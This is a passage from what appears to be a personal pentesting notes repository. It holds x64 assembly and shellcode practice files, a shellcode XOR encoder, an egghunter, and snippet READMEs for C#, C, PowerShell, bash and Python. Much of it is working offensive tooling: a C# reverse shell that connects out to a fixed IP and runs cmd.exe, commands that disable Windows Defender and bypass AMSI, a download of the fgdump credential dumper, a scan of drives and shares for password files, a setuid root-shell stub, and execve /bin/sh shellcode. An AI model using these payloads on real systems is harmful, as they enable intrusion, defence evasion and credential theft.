IP/EIP/RIP directly," 8 | mov rax, 0xDEADBEEF 9 | push rax 10 | hello_world: db "Hello fucker!", 0xa 11 | call _a1 12 | 13 | _a1: 14 | pop rsi 15 | push rsi 16 | 17 | ; push 0xDEAD 18 | ; push 0xBEEF 19 | xor rax, rax 20 | mov al, 1 21 | mov dil, 1 22 | mov rdx, 8 23 | syscall 24 | 25 | mov al, 60 26 | syscall 27 | 28 | 29 | ; _a2: 30 | ; pop rax 31 | ; mov rbx, 0x1 32 | 33 | section .data 34 | ; hello_world: db "Hello fucker!", 0xa 35 | ; length: equ $-hello_world -------------------------------------------------------------------------------- /pwnage/x64 practice/HelloWorld.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | 5 | _start: 6 | mov rax, 1 7 | mov rdi, 1 ; stdout 8 | mov rsi, hello_world 9 | mov rdx, length 10 | syscall 11 | 12 | mov rax, 1 13 | mov rdi, 1 ; stdout 14 | push 0xa 15 | mov rsi, rsp 16 | mov rdx, length 17 | syscall 18 | 19 | mov rax, 60 20 | mov rdi, 11 21 | syscall 22 | 23 | section .data 24 | hello_world: db "Hello fucker!" 25 | ; ,0xa 26 | length: equ $-hello_world -------------------------------------------------------------------------------- /pwnage/x64 practice/HelloWorldNoNulls.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | 5 | _start: 6 | mov al, 1 7 | mov dil, 1 8 | mov rsi, hello_world 9 | mov rdx, length 10 | syscall 11 | 12 | mov al, 1 13 | push 0xa 14 | mov rsi, rsp 15 | mov dl, 0x2 16 | ; mov rdx, 0xd 17 | syscall 18 | 19 | mov al, 60 20 | syscall 21 | 22 | section .data 23 | hello_world: db "Hello fucker!" 24 | length: equ $-hello_world -------------------------------------------------------------------------------- /pwnage/x64 practice/MovingData.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | _start: 5 | 6 | ; mov immediate data to register 7 | mov rax, 0xaaaaaaaabbbbbbbb 8 | mov eax, 0xaaaaaaaa 9 | mov rax, 0xaaaaaaaabbbbbbbb 10 | mov al, 0x11 11 | mov rax, 0xaaaaaaaabbbbbbbb 12 | mov ah, 0xcc 13 | mov rax, 0xaaaaaaaabbbbbbbb 14 | mov ax, 0xdddd 15 | 16 | 17 | ; mov register to register 18 | 19 | mov rbp, rax 20 | mov r10, rbp 21 | 22 | mov r11d, r10d 23 | mov r12w, r11w 24 | mov r13b, r12b 25 | 26 | 27 | ; mov from memory into register 28 | 29 | mov rsi, [sample2] 30 | mov r14d, [sample] 31 | mov r15w, [sample] 32 | mov dil, [sample] 33 | 34 | 35 | ; mov from register into memory 36 | 37 | mov rax, [sample2] 38 | mov byte [sample], al 39 | mov word [sample], ax 40 | mov dword [sample], eax 41 | mov qword [sample], rax 42 | 43 | 44 | ; lea demo 45 | 46 | lea rax, [sample] 47 | lea rbx, [rax] 48 | 49 | 50 | ; xchg demo 51 | mov rax, 0x1234567890abcdef 52 | mov rbx, 0x9999999999999999 53 | 54 | xchg rax, rbx 55 | 56 | 57 | ; exit the program gracefully 58 | 59 | mov rax, 0x3c 60 | mov rdi, 0 61 | syscall 62 | 63 | 64 | section .data 65 | 66 | sample: db 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff, 0x11, 0x22 67 | sample2: dq 0x1122334455667788 68 | sample3: times 8 db 0x00 69 | 70 | 71 | -------------------------------------------------------------------------------- /pwnage/x64 practice/Stack.asm: -------------------------------------------------------------------------------- 1 | ; Filename: MovingData.nasm 2 | ; Author: Vivek Ramachandran 3 | ; Website: http://securitytube.net 4 | ; Training: http://securitytube-training.com 5 | ; 6 | ; 7 | ; Purpose: Stack instructions in 64-bit CPU 8 | 9 | global _start 10 | 11 | section .text 12 | _start: 13 | 14 | mov rax, 0x1122334455667788 15 | push rax 16 | 17 | push sample 18 | 19 | push qword [sample] 20 | 21 | pop r15 22 | pop r14 23 | pop rbx 24 | 25 | ; exit the program gracefully 26 | 27 | mov rax, 0x3c 28 | mov rdi, 0 29 | syscall 30 | 31 | 32 | section .data 33 | 34 | sample: db 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff, 0x11, 0x22 35 | -------------------------------------------------------------------------------- /pwnage/x64 practice/asm-c-run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ $# -eq 0 ] 3 | then 4 | echo "No arguments supplied" 5 | exit 1 6 | fi 7 | 8 | fn="$(cut -d'.' -f1 <<<$1)" 9 | 10 | nasm -felf64 $fn.asm -o /tmp/$fn.o && ld /tmp/$fn.o -o /tmp/$fn 11 | 12 | shellcode="$(for i in $(objdump -d /tmp/$fn -M intel |grep '^ ' |cut -f2); do echo -n '\x'$i; done;echo)" 13 | 14 | cat << EOF > /tmp/shellcode.c 15 | #include 16 | #include 17 | 18 | char code[] = \ 19 | "$shellcode"; 20 | 21 | int main() 22 | { 23 | printf("Shellcode Length: %d bytes\n", strlen(code)); 24 | int (*ret)() = (int(*)())code; 25 | ret(); 26 | } 27 | EOF 28 | 29 | gcc -fno-stack-protector -z execstack /tmp/shellcode.c -o /tmp/shellcode 30 | /tmp/shellcode 31 | -------------------------------------------------------------------------------- /pwnage/x64 practice/asm-debug.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ $# -eq 0 ] 3 | then 4 | echo "No arguments supplied" 5 | exit 1 6 | fi 7 | 8 | # removes extension from file (e.g. filename.asm becomes filename) 9 | fn="$(cut -d'.' -f1 <<<$1)" 10 | 11 | nasm -felf64 $fn.asm -o /tmp/$fn.o && ld /tmp/$fn.o -o /tmp/$fn && gdb /tmp/$fn -ex "break _start" -ex "run" 12 | -------------------------------------------------------------------------------- /pwnage/x64 practice/asm-encoder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import sys 3 | 4 | # for i in $(objdump -d 29-execve.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo 5 | # shellcode = "\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43" 6 | 7 | shellcode = "\x48\x31\xc0\x48\x83\xc0\x3b\x48\x31\xdb\x53\x48\xb9\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x51\x48\x31\xc9\x48\x89\xe7\x53\x48\x89\xe2\x57\x48\x89\xe6\x0f\x05" 8 | 9 | encoded_shellcode = [] 10 | 11 | 12 | if sys.argv[1] == 'xor': 13 | 14 | key = "\xAA" 15 | for i in shellcode: 16 | encoded_byte = ord(i)^ord(key) 17 | if encoded_byte == 0: 18 | print("WARNING: null byte included in resulting shellcode") 19 | sys.exit() 20 | encoded_shellcode.append(encoded_byte) 21 | 22 | 23 | elif sys.argv[1] == 'ins': 24 | 25 | for i in shellcode: 26 | if i == 0: 27 | print("WARNING: null byte included in resulting shellcode") 28 | sys.exit() 29 | encoded_shellcode.append(ord(i)) 30 | encoded_shellcode.append(ord("\xaa")) 31 | encoded_shellcode = encoded_shellcode[:-1] 32 | encoded_shellcode.append(ord("\xbb")) 33 | 34 | else: 35 | sys.exit("Dunno what to do") 36 | 37 | print(f"Size of shellcode: {len(encoded_shellcode)}") 38 | 39 | print("Nasm format:") 40 | print(",".join([hex(i) for i in encoded_shellcode])) 41 | 42 | print("C format:") 43 | print("".join([hex(i).replace('0x','\\x') for i in encoded_shellcode])) 44 | 45 | -------------------------------------------------------------------------------- /pwnage/x64 practice/asm-print.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ $# -eq 0 ] 3 | then 4 | echo "No arguments supplied" 5 | exit 1 6 | fi 7 | 8 | # removes extension from file (e.g. filename.asm becomes filename) 9 | fn="$(cut -d'.' -f1 <<<$1)" 10 | 11 | nasm -felf64 $fn.asm -o /tmp/$fn.o && ld /tmp/$fn.o -o /tmp/$fn 12 | 13 | for i in $(objdump -d /tmp/$fn -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo -------------------------------------------------------------------------------- /pwnage/x64 practice/asm-run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if [ $# -eq 0 ] 3 | then 4 | echo "No arguments supplied" 5 | exit 1 6 | fi 7 | 8 | # removes extension from file (e.g. filename.asm becomes filename) 9 | fn="$(cut -d'.' -f1 <<<$1)" 10 | 11 | nasm -felf64 $fn.asm -o /tmp/$fn.o && ld /tmp/$fn.o -o /tmp/$fn && /tmp/$fn 12 | -------------------------------------------------------------------------------- /pwnage/x64 practice/egghunter-simple.asm: -------------------------------------------------------------------------------- 1 | ; Simple egghunter that tries to search for shellcode located on the same page as itself 2 | ; https://www.exploit-db.com/exploits/38708 3 | ; https://pentesterslife.blog/2017/11/24/x64-egg-hunting-in-linux-systems/ 4 | global _start 5 | 6 | section .text 7 | 8 | _start: 9 | mov rbx, 0x4847464544434241 10 | pop rax ; some address in the stack 11 | search: 12 | inc rax 13 | cmp [rax-8], rbx 14 | jnz search 15 | call rax ; execute shellcode 16 | -------------------------------------------------------------------------------- /pwnage/x64 practice/egghunter.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | unsigned char hunter[] = \ 6 | "\x48\xbb\x41\x42\x43\x44\x45\x46\x47\x48\x58\x48\xff\xc0\x48\x39\x58\xf8\x75\xf7\xff\xd0"; 7 | 8 | unsigned char code[] = \ 9 | "\x41\x42\x43\x44\x45\x46\x47\x48" 10 | "\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43"; 11 | 12 | int main() 13 | { 14 | printf("Hunter Length: %d bytes\n", strlen(hunter)); 15 | printf("Shellcode Length: %d bytes\n", strlen(code)); 16 | int (*ret)() = (int(*)())hunter; 17 | ret(); 18 | } 19 | -------------------------------------------------------------------------------- /pwnage/x64 practice/read-write.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | 5 | extern gets 6 | 7 | _start: 8 | jmp main 9 | 10 | main: 11 | call gets 12 | mov al, 1 13 | mov dil, 1 14 | mov rsi, hello_world 15 | mov rdx, length 16 | syscall 17 | 18 | 19 | xor eax, eax ; rax <- 0 (write syscall number) 20 | xor edi, edi ; rdi <- 0 (stdin file descriptor) 21 | mov rsi, buffer ; rsi <- address of the buffer 22 | mov edx, BUFSIZE ; rdx <- size of the buffer 23 | syscall ; execute 24 | 25 | mov al, 1 26 | mov dil, 1 27 | mov rsi, buffer 28 | mov rdx, BUFSIZE 29 | syscall 30 | 31 | mov al, 1 32 | push 0xa 33 | mov rsi, rsp 34 | mov dl, 0x2 35 | syscall 36 | 37 | mov al, 60 38 | syscall 39 | 40 | section .data 41 | hello_world: db "Hello fucker!" 42 | length: equ $-hello_world 43 | 44 | section .bss 45 | buffer: resb 7 46 | BUFSIZE: equ $-buffer 47 | -------------------------------------------------------------------------------- /pwnage/x64 practice/shell.asm: -------------------------------------------------------------------------------- 1 | global _start 2 | 3 | section .text 4 | _start: 5 | mov rax, 59 6 | mov rdi, bin 7 | mov rsi, string_array 8 | syscall 9 | 10 | section .data 11 | bin: db "/bin/ls", 0 12 | path: db "/", 0 13 | flag: db "-ls", 0 14 | string_array: dq bin, path, flag 15 | -------------------------------------------------------------------------------- /pwnage/x64 practice/shellcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | 5 | unsigned char code[] = \ 6 | "\xeb\x1d\x48\x31\xc0\x5f\x88\x67\x07\x48\x89\x7f\x08\x48\x89\x47\x10\x48\x8d\x77\x08\x48\x8d\x57\x10\x48\x83\xc0\x3b\x0f\x05\xe8\xde\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41\x42\x42\x42\x42\x42\x42\x42\x42\x43\x43\x43\x43\x43\x43\x43\x43"; 7 | 8 | int main() 9 | { 10 | printf("Shellcode Length: %d bytes\n", strlen(code)); 11 | int (*ret)() = (int(*)())code; 12 | ret(); 13 | } 14 | 15 | -------------------------------------------------------------------------------- /pwnage/x64_cheatsheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vergl4s/pentesting-dump/fea85de7d6ac3edf4c5a965b2e4e95f7689fd22f/pwnage/x64_cheatsheet.pdf -------------------------------------------------------------------------------- /reversing/README.md: -------------------------------------------------------------------------------- 1 | ## Reversing stuff 2 | 3 | ### ltrace (Library call tracer) 4 | ```bash 5 | ltrace /usr/bin/myexec 6 | ``` 7 | 8 | ### ldd (List Dynamic Dependencies) 9 | ```bash 10 | ldd /usr/bin/myexec 11 | ``` 12 | 13 | ### LD_PRELOAD (any setuid privileges are dropped) 14 | 15 | ```bash 16 | gcc -fPIC -shared -o evil.so evil.c -nostartfiles 17 | sudo LD_PRELOAD=evil.so 18 | export LD_PRELOAD=evil.so 19 | ``` 20 | 21 | ### Compile library 22 | ```bash 23 | gcc -fPIC -shared -o libseclogin.so exploit.c 24 | ``` 25 | 26 | ### Add path to ldconfig - configure dynamic linker run-time bindings 27 | ```bash 28 | ldconfig -f df.conf # df.conf should have path to folder 29 | ldconfig # no arguments to revert back 30 | export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/foo 31 | ``` 32 | 33 | 34 | ### GDB 35 | 36 | disass 37 | disass 38 | break * 39 | break 40 | stepi 41 | nexti 42 | 43 | ### gcc 44 | 45 | gcc -fno-stack-protector -z execstack shellcode.c -o shellcode 46 | break *&code 47 | 48 | 49 | ### Tools 50 | 51 | nasm -f elf64 file.nasm -o file.o 52 | ld file.o -o file 53 | 54 | objdump -M intel -D Exit.o 55 | objdump -M intel -D file -j .data 56 | 57 | ### radare 58 | 59 | /R pop rdi 60 | 61 | list functions - afl 62 | move to functions - s 63 | disass function - pdf or pdb 64 | visual mode - V then p 65 | rewrite file - A (use mostly when on visual mode) 66 | 67 | 68 | find strings - rabin2 -z 69 | 70 | ### To get elf sections then specific section contents do 71 | 72 | readelf -S ./file 73 | readelf -p 25 ./file 74 | 75 | ### Shellcode examples 76 | 77 | shell-storm.org 78 | 79 | ### Unix System calls 80 | 81 | Registers 82 | 83 | RAX - syscall number 84 | RDI - 1st arg 85 | RSI - 2nd arg 86 | RDX - 3rd arg 87 | R10 - 4th arg 88 | R8 - 5th 89 | R9 - 6th 90 | 91 | man 2 write 92 | 93 | ssize_t write(int fd, const void *buf, size_t count); 94 | 95 | http://blog.tinola.com/?e=5 96 | https://filippo.io/linux-syscall-table/ 97 | 98 | 99 | printf "#include \nSYS_read" | gcc -E - 100 | cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h 101 | 102 | ### Get binary shellcode in right format 103 | 104 | for i in $(objdump -d binary -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo 105 | 106 | ### String to reversed hex 107 | 108 | "/bin//sh"[::-1].encode('hex') 109 | 68732f2f6e69622f 110 | 111 | 112 | ### msf encoders 113 | 114 | echo -ne "shellcode" | msfvenom -f c -e x64/xor -a x64 --platform linux 115 | 116 | 117 | ### variable sizes 118 | 119 | byte 120 | word - 2 bytes 121 | double word - 4 bytes 122 | quad word - 8 bytes -------------------------------------------------------------------------------- /snippets/android/README.md: -------------------------------------------------------------------------------- 1 | ```bash 2 | adb shell pm list packages 3 | adb shell pm clear my.wonderful.app.package 4 | ~/Android/Sdk/tools/emulator -avd Nexus_5_API_25 -use-system-libs 5 | ``` 6 | 7 | * http://forum.xda-developers.com/showthread.php?t=2528952 8 | * https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2012/july/network-analysis-with-proxydroid-burpsuite-and-hipster-dog/ 9 | * http://blog.dornea.nu/2014/12/02/howto-proxy-non-proxy-aware-android-applications-through-burp/ -------------------------------------------------------------------------------- /snippets/av bypass/README.md: -------------------------------------------------------------------------------- 1 | ## AV bypass 2 | 3 | ### Disable Windows Defender (needs admin rights) 4 | 5 | ```powershell 6 | "C:\Program Files\Windows Defender\mpcmdrun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true 7 | powershell -c "Add-MpPreference -ExclusionPath C:\\" 8 | ``` 9 | 10 | ### Disable AMSI 11 | ```powershell 12 | [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null,$true) 13 | ``` -------------------------------------------------------------------------------- /snippets/bash/README.md: -------------------------------------------------------------------------------- 1 | ## Bash snippets 2 | ### Improve limited shell 3 | ```bash 4 | python -c 'import pty; pty.spawn("/bin/bash")' 5 | echo os.system('/bin/bash') 6 | /bin/sh -i 7 | ``` -------------------------------------------------------------------------------- /snippets/c#/README.md: -------------------------------------------------------------------------------- 1 | ## C# snippets 2 | 3 | ### Reverse shell (from https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15) 4 | ```c# 5 | using System; 6 | using System.Text; 7 | using System.IO; 8 | using System.Diagnostics; 9 | using System.ComponentModel; 10 | using System.Linq; 11 | using System.Net; 12 | using System.Net.Sockets; 13 | 14 | 15 | namespace ConnectBack 16 | { 17 | public class Program 18 | { 19 | static StreamWriter streamWriter; 20 | 21 | public static void Main(string[] args) 22 | { 23 | using(TcpClient client = new TcpClient("10.0.2.15", 443)) 24 | { 25 | using(Stream stream = client.GetStream()) 26 | { 27 | using(StreamReader rdr = new StreamReader(stream)) 28 | { 29 | streamWriter = new StreamWriter(stream); 30 | 31 | StringBuilder strInput = new StringBuilder(); 32 | 33 | Process p = new Process(); 34 | p.StartInfo.FileName = "cmd.exe"; 35 | p.StartInfo.CreateNoWindow = true; 36 | p.StartInfo.UseShellExecute = false; 37 | p.StartInfo.RedirectStandardOutput = true; 38 | p.StartInfo.RedirectStandardInput = true; 39 | p.StartInfo.RedirectStandardError = true; 40 | p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler); 41 | p.Start(); 42 | p.BeginOutputReadLine(); 43 | 44 | while(true) 45 | { 46 | strInput.Append(rdr.ReadLine()); 47 | //strInput.Append("\n"); 48 | p.StandardInput.WriteLine(strInput); 49 | strInput.Remove(0, strInput.Length); 50 | } 51 | } 52 | } 53 | } 54 | } 55 | 56 | private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine) 57 | { 58 | StringBuilder strOutput = new StringBuilder(); 59 | 60 | if (!String.IsNullOrEmpty(outLine.Data)) 61 | { 62 | try 63 | { 64 | strOutput.Append(outLine.Data); 65 | streamWriter.WriteLine(strOutput); 66 | streamWriter.Flush(); 67 | } 68 | catch (Exception err) { } 69 | } 70 | } 71 | 72 | } 73 | } 74 | ``` 75 | 76 | -------------------------------------------------------------------------------- /snippets/c/README.md: -------------------------------------------------------------------------------- 1 | ## C snippets 2 | 3 | ### Run bytecode 4 | 5 | ```c 6 | #include 7 | #include 8 | 9 | int main () 10 | { 11 | /* 12 | mov rax, 60 ; sys_exit 13 | mov rdi, 2 14 | syscall 15 | */ 16 | char code[] = { 17 | 0x41,0x41,0x41,0x41 18 | }; 19 | 20 | void *buf; 21 | 22 | /* copy code to executable buffer */ 23 | buf = mmap (0,sizeof(code),PROT_READ|PROT_WRITE|PROT_EXEC, 24 | MAP_PRIVATE|MAP_ANON,-1,0); 25 | memcpy (buf, code, sizeof(code)); 26 | 27 | /* run code */ 28 | ((void (*) (void))buf)(); 29 | 30 | return 0; 31 | } 32 | ``` 33 | 34 | 35 | ### Invoke bash 36 | 37 | ```c 38 | #include 39 | int main(void){ 40 | setuid(0); 41 | setgid(0); 42 | seteuid(0); 43 | setegid(0); 44 | execvp("/bin/sh", NULL, NULL); 45 | } 46 | ``` 47 | -------------------------------------------------------------------------------- /snippets/powershell/README.md: -------------------------------------------------------------------------------- 1 | ## PowerShell snippets 2 | 3 | ### Output 4 | ```powershell 5 | | %{write-host $_} 6 | | Out-File -Encoding Ascii out.txt 7 | | Format-Table -Wrap 8 | | select SamAccountName, Name, useraccountcontrol, 9 | ``` 10 | 11 | ### Import 12 | ```powershell 13 | Import-Module –Name C:\myRandomDirectory\myModule 14 | ``` 15 | 16 | ### Execution Bypass 17 | ```powershell 18 | Set-ExecutionPolicy Bypass -Scope Process 19 | Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted 20 | powershell -ExecutionPolicy ByPass -File script.ps1 21 | powershell.exe -ExecutionPolicy Bypass -C command 22 | powershell.exe -ExecutionPolicy Bypass -EncodedCommand Base64EncodedCommand 23 | ``` 24 | 25 | ### Change proxy 26 | ```powershell 27 | #Change this to whatever proxy you want to use 28 | $newProxy = "http://localhost:8080" 29 | 30 | $path = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\" 31 | 32 | Set-ItemProperty -Path $path -Name "MigrateProxy" -Value 00000001 33 | Set-ItemProperty -Path $path -Name "ProxyEnable" -Value 00000001 34 | Set-ItemProperty -Path $path -Name "ProxyHttp1.1" -Value 00000000 35 | Set-ItemProperty -Path $path -Name "ProxyServer" -Value $newProxy 36 | Set-ItemProperty -Path $path -Name "ProxyOverride" -Value "" 37 | 38 | #Hex array with several configurations, but just want to change the 9th value 39 | $a = (Get-ItemProperty -Path ($path+"Connections\") -Name DefaultConnectionSettings).DefaultConnectionSettings 40 | $a[8] = 3 41 | $a[8] = 29 #to revert 42 | 43 | Set-ItemProperty -Path ($path+"Connections\") -Name DefaultConnectionSettings -Value $a 44 | ``` 45 | 46 | ### Download file 47 | ```powershell 48 | $url = "http://192.168.0.200" 49 | $client = new-object System.Net.WebClient 50 | $client.DownloadFile(($url+"/fgdump.exe"), "fgdump.exe") 51 | ``` 52 | ### Search for files with "pass" 53 | ```powershell 54 | $ErrorActionPreference = "SilentlyContinue" 55 | 56 | Get-PSDrive -PSProvider 'FileSystem' | ForEach-Object { 57 | $directory = $_ 58 | Write-Output "Looking for files in $($directory.Root) ($($directory.Description))" 59 | 60 | # Searching files that contain the string "pass" 61 | Get-ChildItem $directory.Root -Recurse | Where-Object { !$_PSIsContainer } | ForEach-Object { Select-String -path $_.FullName -pattern "password" -SimpleMatch -List } | ForEach-Object { $_.path } 62 | 63 | # Searching for files or directories with "pass" in the filename 64 | Get-ChildItem $directory.Root -Recurse -Include "*pass*" | ForEach-Object {$_.FullName} # Used to find files with password in the filename 65 | } 66 | 67 | @("\\some.ip.add.ress\network_share$") | ForEach-Object { 68 | Write-Output "Looking for files in $($_) " 69 | 70 | # Searching files that contain the string "pass" 71 | Get-ChildItem $_ -Recurse | Where-Object { !$_PSIsContainer } | ForEach-Object { Select-String -path $_.FullName -pattern "password" -SimpleMatch -List } | ForEach-Object { $_.path } 72 | 73 | # Searching for files or directories with "pass" in the filename 74 | Get-ChildItem $_ -Recurse -Include "*pass*" | ForEach-Object {$_.FullName} # Used to find files with password in the filename 75 | } 76 | ``` 77 | 78 | ### Mess with services/processes 79 | ```powershell 80 | Get-Service -name "m*" | Set-Service -StartupType "disabled" 81 | 82 | Stop-Process -force -name name*,any*,etc 83 | 84 | ``` 85 | 86 | ### Port scan 87 | ```powershell 88 | $ErrorActionPreference = "SilentlyContinue" # careful with this 89 | $ports = 1..10000 90 | $ip = "10.1.1.1" 91 | 92 | foreach ($port in $ports) { 93 | if(Test-Connection -BufferSize 32 -Count 1 -Quiet -ComputerName $ip) { 94 | $socket = new-object System.Net.Sockets.TcpClient($ip, $port) 95 | If($socket.Connected) { 96 | "$ip listening to port $port" 97 | $socket.Close() 98 | } 99 | } 100 | } 101 | ``` 102 | 103 | ```powershell 104 | 105 | $socket = new-object System.Net.Sockets.TcpClient("10.1.1.1", 445) 106 | If($socket.Connected) { 107 | "$ip listening to port $port" 108 | $socket.Close() 109 | } 110 | ``` -------------------------------------------------------------------------------- /snippets/python/README.md: -------------------------------------------------------------------------------- 1 | ## Python snippets 2 | 3 | ### TCP client 4 | ```python 5 | import socket 6 | host = 'google.com' 7 | port = 80 8 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 9 | s.connect((host, port)) 10 | s.sendall(b"GET / HTTP/1.1\r\nHost:google.com\r\n\r\n") 11 | response = s.recv(4096) 12 | print(response) 13 | ``` 14 | 15 | ### TCP server 16 | ```python 17 | import socket 18 | import threading 19 | bind_ip = '0.0.0.0' 20 | bind_port = 4445 21 | 22 | 23 | def handler(client_socket): 24 | client_request = client_socket.recv(1024) 25 | print('Received {}'.format(client_request)) 26 | client_socket.sendall(b'ACK\n') 27 | client_socket.close() 28 | 29 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | server.bind((bind_ip, bind_port)) 31 | 32 | server.listen(5) # max backlog of connections 33 | 34 | while True: 35 | client_socket, (ip, port) = server.accept() 36 | print("Received connection from {}:{}".format(ip, port)) 37 | thread = threading.Thread(target=handler, args=(client_socket,)) 38 | thread.start() 39 | ``` 40 | 41 | ### BigIP decoding and encoding 42 | ```python 43 | import struct 44 | import sys 45 | 46 | def decode(ip_int): 47 | print("[*] Decoding {}".format(ip_int)) 48 | host, port, end = str(ip_int).split('.') 49 | a, b, c, d = list(i for i in struct.pack(": 85 | if len(pkt[TCP].payload) > 6: 86 | transactions.append(pkt) 87 | wrpcap('filtered.pcap', transactions) 88 | 89 | ``` 90 | 91 | ### Scapy sending packet 92 | ```python 93 | send(Ether(dst='ff:ff:ff:ff:ff:ff', src='00:01:02:03:04:05')/IP(dst='255.255.255.255', src='1.2.3.4')/TCP(dport=443,sport=12345)) 94 | ``` 95 | 96 | ### Fuzzing 97 | ```python 98 | #!/usr/bin/env python3 99 | 100 | import binascii 101 | import datetime 102 | import socket 103 | import time 104 | 105 | def send_payload(host, port, f, payload): 106 | sent = False 107 | while not sent: 108 | f.write(str(payload) + ":") 109 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 110 | 111 | try: 112 | s.connect((host, port)) 113 | s.settimeout(1.0) 114 | s.sendall(payload) 115 | sent = True 116 | except Exception as e: 117 | print("Connection refused, trying again in 5 seconds.") 118 | time.sleep(5) 119 | try: 120 | response = s.recv(4096) 121 | except Exception as e: 122 | f.write('No Response') 123 | else: 124 | f.write(str(response)) 125 | finally: 126 | s.close() 127 | f.write("\n-----\n") 128 | 129 | def bit_flipping(payload): 130 | for i in range(len(payload)): 131 | # 1 bit flip - 8 permutations per byte 132 | for j in range(8): 133 | copy = bytearray(payload) 134 | copy[i] = copy[i] ^ (1<> j) 141 | yield bytes(copy) # ''.join(chr(c) for c in copy) 142 | 143 | # 4 bits flip - 5 permutations per byte 144 | for j in range(5): 145 | copy = bytearray(payload) 146 | copy[i] = copy[i] ^ (0b11110000 >> j) 147 | yield bytes(copy) # ''.join(chr(c) for c in copy) 148 | 149 | def byte_flipping(payload): 150 | # 1 byte flip 151 | for i in range(len(payload)): 152 | payload_copy = bytearray(payload) 153 | payload_copy[i] = payload_copy[i] ^ 0xFF 154 | yield payload_copy 155 | 156 | # 2 byte flip 157 | for i in range(len(payload)-1): 158 | payload_copy = bytearray(payload) 159 | payload_copy[i] = payload_copy[i] ^ 0xFF 160 | payload_copy[i+1] = payload_copy[i+1] ^ 0xFF 161 | yield payload_copy 162 | 163 | # 4 byte flip 164 | for i in range(len(payload)-3): 165 | payload_copy = bytearray(payload) 166 | payload_copy[i] = payload_copy[i] ^ 0xFF 167 | payload_copy[i+1] = payload_copy[i+1] ^ 0xFF 168 | payload_copy[i+2] = payload_copy[i+2] ^ 0xFF 169 | payload_copy[i+3] = payload_copy[i+3] ^ 0xFF 170 | yield payload_copy 171 | 172 | def known_integers(payload): 173 | 174 | known_2_byte_int = ( 175 | bytearray(b'\x01\x00'), # 256 be 176 | bytearray(b'\x00\x01'), # 256 le 177 | bytearray(b'\x04\x00'), # 1024 be 178 | bytearray(b'\x00\x04'), # 1024 le 179 | bytearray(b'\x10\x00'), # 4096 be 180 | bytearray(b'\x00\x10'), # 4096 le 181 | ) 182 | 183 | for i in range(len(payload)-1): 184 | for known_int in known_2_byte_int: 185 | payload_copy = bytearray(payload) 186 | yield payload_copy[:i] + known_int + payload_copy[i+2:] 187 | 188 | 189 | known_8_byte_int = ( 190 | bytearray(b'\x7f\xff\xff\xff\xff\xff\xff\xff'), # python max_int be 191 | bytearray(b'\x7f\xff\xff\xff\xff\xff\xff\xfe'), # python max int -1 be 192 | bytearray(b'\xff\xff\xff\xff\xff\xff\xff\x7f'), # python max_int le 193 | bytearray(b'\xfe\xff\xff\xff\xff\xff\xff\x7f'), # python max_int -1 le 194 | ) 195 | 196 | for i in range(len(payload)-7): 197 | for known_int in known_8_byte_int: 198 | payload_copy = bytearray(payload) 199 | yield payload_copy[:i] + known_int + payload_copy[i+8:] 200 | 201 | def insert_in_between_bytes(payload, character=0x41): 202 | for i in range(len(payload)): 203 | payload = bytearray(payload) 204 | for inject_len in (4, 8, 16, 32, 64, 128): 205 | yield payload[:i] + bytearray([character]*inject_len) + payload[i:] 206 | 207 | def msg_len_adjustment(msg): 208 | return (len(msg)).to_bytes(4, byteorder='big') + msg[:21] + str(len(msg)).zfill(4).encode() + msg[25:] 209 | 210 | def all_cases(payload): 211 | for case in bit_flipping(payload): 212 | yield case 213 | for case in byte_flipping(payload): 214 | yield case 215 | for case in known_integers(payload): 216 | yield case 217 | for case in insert_in_between_bytes(payload): 218 | yield case 219 | 220 | 221 | if __name__ == '__main__': 222 | host, port = '127.0.0.1', 8080 223 | payload = 